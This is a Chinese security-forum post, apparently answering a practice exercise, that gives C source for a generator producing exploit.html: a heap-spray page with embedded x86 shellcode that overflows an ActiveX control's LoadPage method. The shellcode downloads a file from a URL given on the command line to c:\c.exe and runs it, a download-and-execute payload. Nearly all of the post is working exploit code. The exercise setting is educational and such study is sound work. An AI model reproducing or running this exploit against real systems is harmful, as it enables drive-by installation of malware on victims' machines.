首页
社区
课程
招聘
[原创]b 题
2007-12-30 01:54 5241

[原创]b 题

dummy 活跃值
23
2007-12-30 01:54
5241
下面是我东拼西凑的代码

利用的最简单的 LoadPage 接口
/*
learn fuzzing exploit_me_B.dll
2007-12-29 1:29:05
dummyz@126.com
*/
#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] =
{
        // 必须是偶数大小
        0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
        0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
        0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
        0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
        0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
        0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
        0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
        0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
        0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
        0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
        0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
        "<html><body><object id=\"obj\" classid=\"clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2\"></object><script>"
        "var shellcode = unescape(\"";
const char* script2 = \
        "\");"
        "fillblock = unescape(\"%u9090%u9090\");"
        "while ( fillblock.length < 0x50000 ) fillblock += fillblock;"
        "memory = new Array();"
        "for ( x = 0; x < 400; x++ ) memory[x] = fillblock + shellcode;"
        "var buffer = '\\x0a\\x0a\\x0a\\x0a';"
        "while (buffer.length < 400) buffer += '\\x0a\\x0a\\x0a\\x0a';"
        "obj.LoadPage(buffer, 1, 2, 3);"
        "</script>"
        "</body>"
        "</html>"
        "</script>"
        "</body>"
        "</html>";

int main(int argc, char* argv[])
{
        if ( argc != 2 )
        {
                printf("ex:fuck.exe http://www.test.com/test.exe");
                return -1;
        }

        FILE *file = fopen("exploit.html", "w+");
        if ( file == NULL )
        {
                printf("create 'exploit.html' failed!\n");
                return -2;
        }

        fprintf(file, "%s", script1);
        for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
                fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
       
        const unsigned l = strlen(argv[1]);
        for ( unsigned j = 0; j < l; j += 2 )
                fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);

        fprintf(file, "%s", script2);
        fclose(file);

        printf("make 'exploit.html' successed!\n");

        return 0;
}

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回